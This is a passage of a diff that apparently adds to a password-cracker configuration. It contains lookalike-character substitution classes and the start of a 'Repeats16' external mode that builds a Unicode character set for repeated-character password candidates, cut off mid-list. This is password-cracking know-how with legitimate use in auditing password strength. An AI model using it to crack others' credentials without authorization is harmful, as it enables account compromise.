+L=[£ĹĻĽĿŁȽʟL]
+M=[ƜM]
+N=[ÑŃŅŇŊƝǸȠɴN]
+O=[ÒÓÔÕÖØŌŎŐŒƆƟƠǑǪǬǾȌȎȪȬȮȰƢO]
+P=[ƤP]
+Q=[ɊQ]
+R=[®ŔŖŘƦȐȒɌʀʁʶR]
+S=[ŚŜŞŠƧȘS]
+T=[ŢŤƬƮȚȾT]
+U=[ÙÚÛÜŨŪŬŮŰŲƯǓǕǗǙǛȔȖɄU]
+V=[ɅV]
+W=[ŴW]
+Y=[¥ÝŶŸƳȲɎʏY]
+Z=[ŹŻŽƵȤZ]
+a=[àáâãäåæāăąǎǟǡǻȁȃȧɐɑɒa]
+b=[ƀƃɓb]
+c=[¢©çćĉċčƈȼɕc]
+d=[ðďđƌƍȡɖɗǳd]
+e=[èéêëēĕėęěǝȅȇȩɇɘəɚɛɜɝɞe]
+f=[ƒf]
+g=[ĝğġģǥǧǵɠɡg]
+h=[ħȟɥɦʮʯʰʱĥh]
+i=[ìíîïĩīĭįıǐȉȋɨi]
+j=[ĵǰȷɉɟʄʝʲj]
+k=[ķƙǩʞ]
+l=[ĺļľŀłƚƛȴɫɬɭl]
+m=[µɯɰɱm]
+n=[ñńņňŉŋƞǹȵɲɳn]
+o=[òóôõöøōŏőœơǒǫǭǿȍȏȫȭȯȱɵƣȣo]
+p=[ƥp]
+q=[ɋʠq]
+r=[ŕŗřȑȓɍɹɺɻɼɽɾɿʳʴʵr]
+s=[śŝşšſƨșȿʂs]
+t=[ţťŦŧƫƭțȶʇʈt]
+u=[ùúûüũūŭůűųưǔǖǘǚǜȕȗʉu]
+v=[ʌv]
+w=[ŵʍʷw]
+x=[×x]
+y=[ýÿŷƴȳɏʎʸy]
+z=[źżžƶȥɀʐʑz]
@@ -0,0 +1,1401 @@
+# This software is Copyright (c) 2012-2018 magnum, and it is hereby
+# released to the general public under the following terms:
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted.
+#
+# Try strings of repeated characters, Unicode (version 11) BMP version
+#
+# Number of candidates = 55,292 x max-length
+#
+# Note that these modes will handle --max-len differently than normal: They
+# will consider number of characters as opposed to number of bytes. This
+# means you can naturally just use e.g. --max-len=3 for generating all
+# three-character candidates (which may be up to 9 bytes each).
+[List.External:Repeats16]
+int minlength, maxlength, maxc, length, c;
+int charset[0x10000];
+
+void init()
+{
+	int i;
+
+	# Trigger UTF-32 handling in External mode
+	utf32 = 1;
+
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;
+
+/*
+ * This defines the character set. This is auto-generated from UnicodeData.txt
+ * and we skip control characters.
+ */
+	i = 0;
+// 0000..007F; Basic Latin
+	c = 0x20;		// from SPACE
+	while (c <= 0x7e)	// ..to TILDE
+		charset[i++] = c++;
+// 0080..00FF; Latin-1 Supplement
+	c = 0xa0;		// from NO-BREAK SPACE
+	while (c <= 0xff)	// ..to LATIN SMALL LETTER Y WITH DIAERESIS
+		charset[i++] = c++;
+// 0100..017F; Latin Extended-A
+	c = 0x100;		// from LATIN CAPITAL LETTER A WITH MACRON
+	while (c <= 0x17f)	// ..to LATIN SMALL LETTER LONG S
+		charset[i++] = c++;
+// 0180..024F; Latin Extended-B
+	c = 0x180;		// from LATIN SMALL LETTER B WITH STROKE
+	while (c <= 0x24f)	// ..to LATIN SMALL LETTER Y WITH STROKE
+		charset[i++] = c++;
+// 0250..02AF; IPA Extensions
+	c = 0x250;		// from LATIN SMALL LETTER TURNED A
+	while (c <= 0x2af)	// ..to LATIN SMALL LETTER TURNED H WITH FISHHOOK AND TAIL
+		charset[i++] = c++;
+// 02B0..02FF; Spacing Modifier Letters
+	c = 0x2b0;		// from MODIFIER LETTER SMALL H
+	while (c <= 0x2ff)	// ..to MODIFIER LETTER LOW LEFT ARROW
+		charset[i++] = c++;
+// 0300..036F; Combining Diacritical Marks
+	c = 0x300;		// from COMBINING GRAVE ACCENT
+	while (c <= 0x36f)	// ..to COMBINING LATIN SMALL LETTER X
+		charset[i++] = c++;
+// 0370..03FF; Greek and Coptic
+	c = 0x370;		// from GREEK CAPITAL LETTER HETA
+	while (c <= 0x377)	// ..to GREEK SMALL LETTER PAMPHYLIAN DIGAMMA
+		charset[i++] = c++;
+	c = 0x37a;		// from GREEK YPOGEGRAMMENI
+	while (c <= 0x37f)	// ..to GREEK CAPITAL LETTER YOT
+		charset[i++] = c++;
+	c = 0x384;		// from GREEK TONOS
+	while (c <= 0x38a)	// ..to GREEK CAPITAL LETTER IOTA WITH TONOS
+		charset[i++] = c++;
+	c = 0x38e;		// from GREEK CAPITAL LETTER UPSILON WITH TONOS
+	while (c <= 0x3a1)	// ..to GREEK CAPITAL LETTER RHO
+		charset[i++] = c++;
+	c = 0x3a3;		// from GREEK CAPITAL LETTER SIGMA
+	while (c <= 0x3ff)	// ..to GREEK CAPITAL REVERSED DOTTED LUNATE SIGMA SYMBOL
+		charset[i++] = c++;
+// 0400..04FF; Cyrillic
+	c = 0x400;		// from CYRILLIC CAPITAL LETTER IE WITH GRAVE
+	while (c <= 0x4ff)	// ..to CYRILLIC SMALL LETTER HA WITH STROKE
+		charset[i++] = c++;
+// 0500..052F; Cyrillic Supplement
+	c = 0x500;		// from CYRILLIC CAPITAL LETTER KOMI DE
+	while (c <= 0x52f)	// ..to CYRILLIC SMALL LETTER EL WITH DESCENDER
+		charset[i++] = c++;
+// 0530..058F; Armenian
+	c = 0x531;		// from ARMENIAN CAPITAL LETTER AYB
+	while (c <= 0x556)	// ..to ARMENIAN CAPITAL LETTER FEH
+		charset[i++] = c++;
+	c = 0x559;		// from ARMENIAN MODIFIER LETTER LEFT HALF RING
+	while (c <= 0x58a)	// ..to ARMENIAN HYPHEN
+		charset[i++] = c++;
+	charset[i++] = 0x58d;	// RIGHT-FACING ARMENIAN ETERNITY SIGN
+	charset[i++] = 0x58f;	// ARMENIAN DRAM SIGN
+// 0590..05FF; Hebrew
+	c = 0x591;		// from HEBREW ACCENT ETNAHTA
+	while (c <= 0x5c7)	// ..to HEBREW POINT QAMATS QATAN
+		charset[i++] = c++;
+	c = 0x5d0;		// from HEBREW LETTER ALEF
+	while (c <= 0x5ea)	// ..to HEBREW LETTER TAV
+		charset[i++] = c++;
+	c = 0x5ef;		// from HEBREW YOD TRIANGLE
+	while (c <= 0x5f4)	// ..to HEBREW PUNCTUATION GERSHAYIM
+		charset[i++] = c++;
+// 0600..06FF; Arabic
+	c = 0x600;		// from ARABIC NUMBER SIGN
+	while (c <= 0x61c)	// ..to ARABIC LETTER MARK
+		charset[i++] = c++;
+	c = 0x61e;		// from ARABIC TRIPLE DOT PUNCTUATION MARK
+	while (c <= 0x6ff)	// ..to ARABIC LETTER HEH WITH INVERTED V
+		charset[i++] = c++;
+// 0700..074F; Syriac
+	c = 0x700;		// from SYRIAC END OF PARAGRAPH
+	while (c <= 0x70d)	// ..to SYRIAC HARKLEAN ASTERISCUS
+		charset[i++] = c++;
+	c = 0x70f;		// from SYRIAC ABBREVIATION MARK
+	while (c <= 0x74a)	// ..to SYRIAC BARREKH
+		charset[i++] = c++;
+	charset[i++] = 0x74d;	// SYRIAC LETTER SOGDIAN ZHAIN
+	charset[i++] = 0x74f;	// SYRIAC LETTER SOGDIAN FE
+// 0750..077F; Arabic Supplement
+	c = 0x750;		// from ARABIC LETTER BEH WITH THREE DOTS HORIZONTALLY BELOW
+	while (c <= 0x77f)	// ..to ARABIC LETTER KAF WITH TWO DOTS ABOVE
+		charset[i++] = c++;
+// 0780..07BF; Thaana
+	c = 0x780;		// from THAANA LETTER HAA
+	while (c <= 0x7b1)	// ..to THAANA LETTER NAA
+		charset[i++] = c++;
+// 07C0..07FF; NKo
+	c = 0x7c0;		// from NKO DIGIT ZERO
+	while (c <= 0x7fa)	// ..to NKO LAJANYALAN
+		charset[i++] = c++;
+	charset[i++] = 0x7fd;	// NKO DANTAYALAN
+	charset[i++] = 0x7ff;	// NKO TAMAN SIGN
+// 0800..083F; Samaritan
+	c = 0x800;		// from SAMARITAN LETTER ALAF
+	while (c <= 0x82d)	// ..to SAMARITAN MARK NEQUDAA
+		charset[i++] = c++;
+	c = 0x830;		// from SAMARITAN PUNCTUATION NEQUDAA
+	while (c <= 0x83e)	// ..to SAMARITAN PUNCTUATION ANNAAU
+		charset[i++] = c++;
+// 0840..085F; Mandaic
+	c = 0x840;		// from MANDAIC LETTER HALQA
+	while (c <= 0x85b)	// ..to MANDAIC GEMINATION MARK
+		charset[i++] = c++;
+	charset[i++] = 0x85e;	// MANDAIC PUNCTUATION
+// 0860..086F; Syriac Supplement
+	c = 0x860;		// from SYRIAC LETTER MALAYALAM NGA
+	while (c <= 0x86a)	// ..to SYRIAC LETTER MALAYALAM SSA
+		charset[i++] = c++;
+// 08A0..08FF; Arabic Extended-A
+	c = 0x8a0;		// from ARABIC LETTER BEH WITH SMALL V BELOW
+	while (c <= 0x8b4)	// ..to ARABIC LETTER KAF WITH DOT BELOW
+		charset[i++] = c++;
+	c = 0x8b6;		// from ARABIC LETTER BEH WITH SMALL MEEM ABOVE
+	while (c <= 0x8bd)	// ..to ARABIC LETTER AFRICAN NOON
+		charset[i++] = c++;
+	c = 0x8d3;		// from ARABIC SMALL LOW WAW
+	while (c <= 0x8ff)	// ..to ARABIC MARK SIDEWAYS NOON GHUNNA
+		charset[i++] = c++;
+// 0900..097F; Devanagari
+	c = 0x900;		// from DEVANAGARI SIGN INVERTED CANDRABINDU
+	while (c <= 0x97f)	// ..to DEVANAGARI LETTER BBA
+		charset[i++] = c++;
+// 0980..09FF; Bengali
+	c = 0x980;		// from BENGALI ANJI
+	while (c <= 0x983)	// ..to BENGALI SIGN VISARGA
+		charset[i++] = c++;
+	c = 0x985;		// from BENGALI LETTER A
+	while (c <= 0x98c)	// ..to BENGALI LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0x98f;	// BENGALI LETTER E
+	charset[i++] = 0x990;	// BENGALI LETTER AI
+	c = 0x993;		// from BENGALI LETTER O
+	while (c <= 0x9a8)	// ..to BENGALI LETTER NA
+		charset[i++] = c++;
+	c = 0x9aa;		// from BENGALI LETTER PA
+	while (c <= 0x9b0)	// ..to BENGALI LETTER RA
+		charset[i++] = c++;
+	c = 0x9b6;		// from BENGALI LETTER SHA
+	while (c <= 0x9b9)	// ..to BENGALI LETTER HA
+		charset[i++] = c++;
+	c = 0x9bc;		// from BENGALI SIGN NUKTA
+	while (c <= 0x9c4)	// ..to BENGALI VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0x9c7;	// BENGALI VOWEL SIGN E
+	charset[i++] = 0x9c8;	// BENGALI VOWEL SIGN AI
+	c = 0x9cb;		// from BENGALI VOWEL SIGN O
+	while (c <= 0x9ce)	// ..to BENGALI LETTER KHANDA TA
+		charset[i++] = c++;
+	charset[i++] = 0x9dc;	// BENGALI LETTER RRA
+	charset[i++] = 0x9dd;	// BENGALI LETTER RHA
+	c = 0x9df;		// from BENGALI LETTER YYA
+	while (c <= 0x9e3)	// ..to BENGALI VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0x9e6;		// from BENGALI DIGIT ZERO
+	while (c <= 0x9fe)	// ..to BENGALI SANDHI MARK
+		charset[i++] = c++;
+// 0A00..0A7F; Gurmukhi
+	charset[i++] = 0xa01;	// GURMUKHI SIGN ADAK BINDI
+	charset[i++] = 0xa03;	// GURMUKHI SIGN VISARGA
+	c = 0xa05;		// from GURMUKHI LETTER A
+	while (c <= 0xa0a)	// ..to GURMUKHI LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0xa0f;	// GURMUKHI LETTER EE
+	charset[i++] = 0xa10;	// GURMUKHI LETTER AI
+	c = 0xa13;		// from GURMUKHI LETTER OO
+	while (c <= 0xa28)	// ..to GURMUKHI LETTER NA
+		charset[i++] = c++;
+	c = 0xa2a;		// from GURMUKHI LETTER PA
+	while (c <= 0xa30)	// ..to GURMUKHI LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xa32;	// GURMUKHI LETTER LA
+	charset[i++] = 0xa33;	// GURMUKHI LETTER LLA
+	charset[i++] = 0xa35;	// GURMUKHI LETTER VA
+	charset[i++] = 0xa36;	// GURMUKHI LETTER SHA
+	charset[i++] = 0xa38;	// GURMUKHI LETTER SA
+	charset[i++] = 0xa39;	// GURMUKHI LETTER HA
+	c = 0xa3e;		// from GURMUKHI VOWEL SIGN AA
+	while (c <= 0xa42)	// ..to GURMUKHI VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xa47;	// GURMUKHI VOWEL SIGN EE
+	charset[i++] = 0xa48;	// GURMUKHI VOWEL SIGN AI
+	charset[i++] = 0xa4b;	// GURMUKHI VOWEL SIGN OO
+	charset[i++] = 0xa4d;	// GURMUKHI SIGN VIRAMA
+	c = 0xa59;		// from GURMUKHI LETTER KHHA
+	while (c <= 0xa5c)	// ..to GURMUKHI LETTER RRA
+		charset[i++] = c++;
+	c = 0xa66;		// from GURMUKHI DIGIT ZERO
+	while (c <= 0xa76)	// ..to GURMUKHI ABBREVIATION SIGN
+		charset[i++] = c++;
+// 0A80..0AFF; Gujarati
+	charset[i++] = 0xa81;	// GUJARATI SIGN CANDRABINDU
+	charset[i++] = 0xa83;	// GUJARATI SIGN VISARGA
+	c = 0xa85;		// from GUJARATI LETTER A
+	while (c <= 0xa8d)	// ..to GUJARATI VOWEL CANDRA E
+		charset[i++] = c++;
+	charset[i++] = 0xa8f;	// GUJARATI LETTER E
+	charset[i++] = 0xa91;	// GUJARATI VOWEL CANDRA O
+	c = 0xa93;		// from GUJARATI LETTER O
+	while (c <= 0xaa8)	// ..to GUJARATI LETTER NA
+		charset[i++] = c++;
+	c = 0xaaa;		// from GUJARATI LETTER PA
+	while (c <= 0xab0)	// ..to GUJARATI LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xab2;	// GUJARATI LETTER LA
+	charset[i++] = 0xab3;	// GUJARATI LETTER LLA
+	c = 0xab5;		// from GUJARATI LETTER VA
+	while (c <= 0xab9)	// ..to GUJARATI LETTER HA
+		charset[i++] = c++;
+	c = 0xabc;		// from GUJARATI SIGN NUKTA
+	while (c <= 0xac5)	// ..to GUJARATI VOWEL SIGN CANDRA E
+		charset[i++] = c++;
+	charset[i++] = 0xac7;	// GUJARATI VOWEL SIGN E
+	charset[i++] = 0xac9;	// GUJARATI VOWEL SIGN CANDRA O
+	charset[i++] = 0xacb;	// GUJARATI VOWEL SIGN O
+	charset[i++] = 0xacd;	// GUJARATI SIGN VIRAMA
+	c = 0xae0;		// from GUJARATI LETTER VOCALIC RR
+	while (c <= 0xae3)	// ..to GUJARATI VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xae6;		// from GUJARATI DIGIT ZERO
+	while (c <= 0xaf1)	// ..to GUJARATI RUPEE SIGN
+		charset[i++] = c++;
+	c = 0xaf9;		// from GUJARATI LETTER ZHA
+	while (c <= 0xaff)	// ..to GUJARATI SIGN TWO-CIRCLE NUKTA ABOVE
+		charset[i++] = c++;
+// 0B00..0B7F; Oriya
+	charset[i++] = 0xb01;	// ORIYA SIGN CANDRABINDU
+	charset[i++] = 0xb03;	// ORIYA SIGN VISARGA
+	c = 0xb05;		// from ORIYA LETTER A
+	while (c <= 0xb0c)	// ..to ORIYA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xb0f;	// ORIYA LETTER E
+	charset[i++] = 0xb10;	// ORIYA LETTER AI
+	c = 0xb13;		// from ORIYA LETTER O
+	while (c <= 0xb28)	// ..to ORIYA LETTER NA
+		charset[i++] = c++;
+	c = 0xb2a;		// from ORIYA LETTER PA
+	while (c <= 0xb30)	// ..to ORIYA LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xb32;	// ORIYA LETTER LA
+	charset[i++] = 0xb33;	// ORIYA LETTER LLA
+	c = 0xb35;		// from ORIYA LETTER VA
+	while (c <= 0xb39)	// ..to ORIYA LETTER HA
+		charset[i++] = c++;
+	c = 0xb3c;		// from ORIYA SIGN NUKTA
+	while (c <= 0xb44)	// ..to ORIYA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xb47;	// ORIYA VOWEL SIGN E
+	charset[i++] = 0xb48;	// ORIYA VOWEL SIGN AI
+	charset[i++] = 0xb4b;	// ORIYA VOWEL SIGN O
+	charset[i++] = 0xb4d;	// ORIYA SIGN VIRAMA
+	charset[i++] = 0xb56;	// ORIYA AI LENGTH MARK
+	charset[i++] = 0xb57;	// ORIYA AU LENGTH MARK
+	charset[i++] = 0xb5c;	// ORIYA LETTER RRA
+	charset[i++] = 0xb5d;	// ORIYA LETTER RHA
+	c = 0xb5f;		// from ORIYA LETTER YYA
+	while (c <= 0xb63)	// ..to ORIYA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xb66;		// from ORIYA DIGIT ZERO
+	while (c <= 0xb77)	// ..to ORIYA FRACTION THREE SIXTEENTHS
+		charset[i++] = c++;
+// 0B80..0BFF; Tamil
+	charset[i++] = 0xb82;	// TAMIL SIGN ANUSVARA
+	charset[i++] = 0xb83;	// TAMIL SIGN VISARGA
+	c = 0xb85;		// from TAMIL LETTER A
+	while (c <= 0xb8a)	// ..to TAMIL LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0xb8e;	// TAMIL LETTER E
+	charset[i++] = 0xb90;	// TAMIL LETTER AI
+	c = 0xb92;		// from TAMIL LETTER O
+	while (c <= 0xb95)	// ..to TAMIL LETTER KA
+		charset[i++] = c++;
+	charset[i++] = 0xb99;	// TAMIL LETTER NGA
+	charset[i++] = 0xb9a;	// TAMIL LETTER CA
+	charset[i++] = 0xb9e;	// TAMIL LETTER NYA
+	charset[i++] = 0xb9f;	// TAMIL LETTER TTA
+	charset[i++] = 0xba3;	// TAMIL LETTER NNA
+	charset[i++] = 0xba4;	// TAMIL LETTER TA
+	charset[i++] = 0xba8;	// TAMIL LETTER NA
+	charset[i++] = 0xbaa;	// TAMIL LETTER PA
+	c = 0xbae;		// from TAMIL LETTER MA
+	while (c <= 0xbb9)	// ..to TAMIL LETTER HA
+		charset[i++] = c++;
+	c = 0xbbe;		// from TAMIL VOWEL SIGN AA
+	while (c <= 0xbc2)	// ..to TAMIL VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xbc6;	// TAMIL VOWEL SIGN E
+	charset[i++] = 0xbc8;	// TAMIL VOWEL SIGN AI
+	c = 0xbca;		// from TAMIL VOWEL SIGN O
+	while (c <= 0xbcd)	// ..to TAMIL SIGN VIRAMA
+		charset[i++] = c++;
+	c = 0xbe6;		// from TAMIL DIGIT ZERO
+	while (c <= 0xbfa)	// ..to TAMIL NUMBER SIGN
+		charset[i++] = c++;
+// 0C00..0C7F; Telugu
+	c = 0xc00;		// from TELUGU SIGN COMBINING CANDRABINDU ABOVE
+	while (c <= 0xc0c)	// ..to TELUGU LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xc0e;	// TELUGU LETTER E
+	charset[i++] = 0xc10;	// TELUGU LETTER AI
+	c = 0xc12;		// from TELUGU LETTER O
+	while (c <= 0xc28)	// ..to TELUGU LETTER NA
+		charset[i++] = c++;
+	c = 0xc2a;		// from TELUGU LETTER PA
+	while (c <= 0xc39)	// ..to TELUGU LETTER HA
+		charset[i++] = c++;
+	c = 0xc3d;		// from TELUGU SIGN AVAGRAHA
+	while (c <= 0xc44)	// ..to TELUGU VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xc46;	// TELUGU VOWEL SIGN E
+	charset[i++] = 0xc48;	// TELUGU VOWEL SIGN AI
+	c = 0xc4a;		// from TELUGU VOWEL SIGN O
+	while (c <= 0xc4d)	// ..to TELUGU SIGN VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xc55;	// TELUGU LENGTH MARK
+	charset[i++] = 0xc56;	// TELUGU AI LENGTH MARK
+	charset[i++] = 0xc58;	// TELUGU LETTER TSA
+	charset[i++] = 0xc5a;	// TELUGU LETTER RRRA
+	c = 0xc60;		// from TELUGU LETTER VOCALIC RR
+	while (c <= 0xc63)	// ..to TELUGU VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xc66;		// from TELUGU DIGIT ZERO
+	while (c <= 0xc6f)	// ..to TELUGU DIGIT NINE
+		charset[i++] = c++;
+	c = 0xc78;		// from TELUGU FRACTION DIGIT ZERO FOR ODD POWERS OF FOUR
+	while (c <= 0xc7f)	// ..to TELUGU SIGN TUUMU
+		charset[i++] = c++;
+// 0C80..0CFF; Kannada
+	c = 0xc80;		// from KANNADA SIGN SPACING CANDRABINDU
+	while (c <= 0xc8c)	// ..to KANNADA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xc8e;	// KANNADA LETTER E
+	charset[i++] = 0xc90;	// KANNADA LETTER AI
+	c = 0xc92;		// from KANNADA LETTER O
+	while (c <= 0xca8)	// ..to KANNADA LETTER NA
+		charset[i++] = c++;
+	c = 0xcaa;		// from KANNADA LETTER PA
+	while (c <= 0xcb3)	// ..to KANNADA LETTER LLA
+		charset[i++] = c++;
+	c = 0xcb5;		// from KANNADA LETTER VA
+	while (c <= 0xcb9)	// ..to KANNADA LETTER HA
+		charset[i++] = c++;
+	c = 0xcbc;		// from KANNADA SIGN NUKTA
+	while (c <= 0xcc4)	// ..to KANNADA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xcc6;	// KANNADA VOWEL SIGN E
+	charset[i++] = 0xcc8;	// KANNADA VOWEL SIGN AI
+	c = 0xcca;		// from KANNADA VOWEL SIGN O
+	while (c <= 0xccd)	// ..to KANNADA SIGN VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xcd5;	// KANNADA LENGTH MARK
+	charset[i++] = 0xcd6;	// KANNADA AI LENGTH MARK
+	c = 0xce0;		// from KANNADA LETTER VOCALIC RR
+	while (c <= 0xce3)	// ..to KANNADA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xce6;		// from KANNADA DIGIT ZERO
+	while (c <= 0xcef)	// ..to KANNADA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xcf1;	// KANNADA SIGN JIHVAMULIYA
+	charset[i++] = 0xcf2;	// KANNADA SIGN UPADHMANIYA
+// 0D00..0D7F; Malayalam
+	c = 0xd00;		// from MALAYALAM SIGN COMBINING ANUSVARA ABOVE
+	while (c <= 0xd03)	// ..to MALAYALAM SIGN VISARGA
+		charset[i++] = c++;
+	c = 0xd05;		// from MALAYALAM LETTER A
+	while (c <= 0xd0c)	// ..to MALAYALAM LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xd0e;	// MALAYALAM LETTER E
+	charset[i++] = 0xd10;	// MALAYALAM LETTER AI
+	c = 0xd12;		// from MALAYALAM LETTER O
+	while (c <= 0xd44)	// ..to MALAYALAM VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xd46;	// MALAYALAM VOWEL SIGN E
+	charset[i++] = 0xd48;	// MALAYALAM VOWEL SIGN AI
+	c = 0xd4a;		// from MALAYALAM VOWEL SIGN O
+	while (c <= 0xd4f)	// ..to MALAYALAM SIGN PARA
+		charset[i++] = c++;
+	c = 0xd54;		// from MALAYALAM LETTER CHILLU M
+	while (c <= 0xd63)	// ..to MALAYALAM VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xd66;		// from MALAYALAM DIGIT ZERO
+	while (c <= 0xd7f)	// ..to MALAYALAM LETTER CHILLU K
+		charset[i++] = c++;
+// 0D80..0DFF; Sinhala
+	charset[i++] = 0xd82;	// SINHALA SIGN ANUSVARAYA
+	charset[i++] = 0xd83;	// SINHALA SIGN VISARGAYA
+	c = 0xd85;		// from SINHALA LETTER AYANNA
+	while (c <= 0xd96)	// ..to SINHALA LETTER AUYANNA
+		charset[i++] = c++;
+	c = 0xd9a;		// from SINHALA LETTER ALPAPRAANA KAYANNA
+	while (c <= 0xdb1)	// ..to SINHALA LETTER DANTAJA NAYANNA
+		charset[i++] = c++;
+	c = 0xdb3;		// from SINHALA LETTER SANYAKA DAYANNA
+	while (c <= 0xdbb)	// ..to SINHALA LETTER RAYANNA
+		charset[i++] = c++;
+	c = 0xdc0;		// from SINHALA LETTER VAYANNA
+	while (c <= 0xdc6)	// ..to SINHALA LETTER FAYANNA
+		charset[i++] = c++;
+	c = 0xdcf;		// from SINHALA VOWEL SIGN AELA-PILLA
+	while (c <= 0xdd4)	// ..to SINHALA VOWEL SIGN KETTI PAA-PILLA
+		charset[i++] = c++;
+	c = 0xdd8;		// from SINHALA VOWEL SIGN GAETTA-PILLA
+	while (c <= 0xddf)	// ..to SINHALA VOWEL SIGN GAYANUKITTA
+		charset[i++] = c++;
+	c = 0xde6;		// from SINHALA LITH DIGIT ZERO
+	while (c <= 0xdef)	// ..to SINHALA LITH DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xdf2;	// SINHALA VOWEL SIGN DIGA GAETTA-PILLA
+	charset[i++] = 0xdf4;	// SINHALA PUNCTUATION KUNDDALIYA
+// 0E00..0E7F; Thai
+	c = 0xe01;		// from THAI CHARACTER KO KAI
+	while (c <= 0xe3a)	// ..to THAI CHARACTER PHINTHU
+		charset[i++] = c++;
+	c = 0xe3f;		// from THAI CURRENCY SYMBOL BAHT
+	while (c <= 0xe5b)	// ..to THAI CHARACTER KHOMUT
+		charset[i++] = c++;
+// 0E80..0EFF; Lao
+	charset[i++] = 0xe81;	// LAO LETTER KO
+	charset[i++] = 0xe82;	// LAO LETTER KHO SUNG
+	charset[i++] = 0xe87;	// LAO LETTER NGO
+	charset[i++] = 0xe88;	// LAO LETTER CO
+	c = 0xe94;		// from LAO LETTER DO
+	while (c <= 0xe97)	// ..to LAO LETTER THO TAM
+		charset[i++] = c++;
+	c = 0xe99;		// from LAO LETTER NO
+	while (c <= 0xe9f)	// ..to LAO LETTER FO SUNG
+		charset[i++] = c++;
+	charset[i++] = 0xea1;	// LAO LETTER MO
+	charset[i++] = 0xea3;	// LAO LETTER LO LING
+	charset[i++] = 0xeaa;	// LAO LETTER SO SUNG
+	charset[i++] = 0xeab;	// LAO LETTER HO SUNG
+	c = 0xead;		// from LAO LETTER O
+	while (c <= 0xeb9)	// ..to LAO VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xebb;	// LAO VOWEL SIGN MAI KON
+	charset[i++] = 0xebd;	// LAO SEMIVOWEL SIGN NYO
+	c = 0xec0;		// from LAO VOWEL SIGN E
+	while (c <= 0xec4)	// ..to LAO VOWEL SIGN AI
+		charset[i++] = c++;
+	c = 0xec8;		// from LAO TONE MAI EK
+	while (c <= 0xecd)	// ..to LAO NIGGAHITA
+		charset[i++] = c++;
+	c = 0xed0;		// from LAO DIGIT ZERO
+	while (c <= 0xed9)	// ..to LAO DIGIT NINE
+		charset[i++] = c++;
+	c = 0xedc;		// from LAO HO NO
+	while (c <= 0xedf)	// ..to LAO LETTER KHMU NYO
+		charset[i++] = c++;
+// 0F00..0FFF; Tibetan
+	c = 0xf00;		// from TIBETAN SYLLABLE OM
+	while (c <= 0xf47)	// ..to TIBETAN LETTER JA
+		charset[i++] = c++;
+	c = 0xf49;		// from TIBETAN LETTER NYA
+	while (c <= 0xf6c)	// ..to TIBETAN LETTER RRA
+		charset[i++] = c++;
+	c = 0xf71;		// from TIBETAN VOWEL SIGN AA
+	while (c <= 0xf97)	// ..to TIBETAN SUBJOINED LETTER JA
+		charset[i++] = c++;
+	c = 0xf99;		// from TIBETAN SUBJOINED LETTER NYA
+	while (c <= 0xfbc)	// ..to TIBETAN SUBJOINED LETTER FIXED-FORM RA
+		charset[i++] = c++;
+	c = 0xfbe;		// from TIBETAN KU RU KHA
+	while (c <= 0xfcc)	// ..to TIBETAN SYMBOL NOR BU BZHI -KHYIL
+		charset[i++] = c++;
+	c = 0xfce;		// from TIBETAN SIGN RDEL NAG RDEL DKAR
+	while (c <= 0xfda)	// ..to TIBETAN MARK TRAILING MCHAN RTAGS
+		charset[i++] = c++;
+// 1000..109F; Myanmar
+	c = 0x1000;		// from MYANMAR LETTER KA
+	while (c <= 0x109f)	// ..to MYANMAR SYMBOL SHAN EXCLAMATION
+		charset[i++] = c++;
+// 10A0..10FF; Georgian
+	c = 0x10a0;		// from GEORGIAN CAPITAL LETTER AN
+	while (c <= 0x10c5)	// ..to GEORGIAN CAPITAL LETTER HOE
+		charset[i++] = c++;
+	c = 0x10d0;		// from GEORGIAN LETTER AN
+	while (c <= 0x10ff)	// ..to GEORGIAN LETTER LABIAL SIGN
+		charset[i++] = c++;
+// 1100..11FF; Hangul Jamo
+	c = 0x1100;		// from HANGUL CHOSEONG KIYEOK
+	while (c <= 0x11ff)	// ..to HANGUL JONGSEONG SSANGNIEUN
+		charset[i++] = c++;
+// 1200..137F; Ethiopic
+	c = 0x1200;		// from ETHIOPIC SYLLABLE HA
+	while (c <= 0x1248)	// ..to ETHIOPIC SYLLABLE QWA
+		charset[i++] = c++;
+	c = 0x124a;		// from ETHIOPIC SYLLABLE QWI
+	while (c <= 0x124d)	// ..to ETHIOPIC SYLLABLE QWE
+		charset[i++] = c++;
+	c = 0x1250;		// from ETHIOPIC SYLLABLE QHA
+	while (c <= 0x1256)	// ..to ETHIOPIC SYLLABLE QHO
+		charset[i++] = c++;
+	c = 0x125a;		// from ETHIOPIC SYLLABLE QHWI
+	while (c <= 0x125d)	// ..to ETHIOPIC SYLLABLE QHWE
+		charset[i++] = c++;
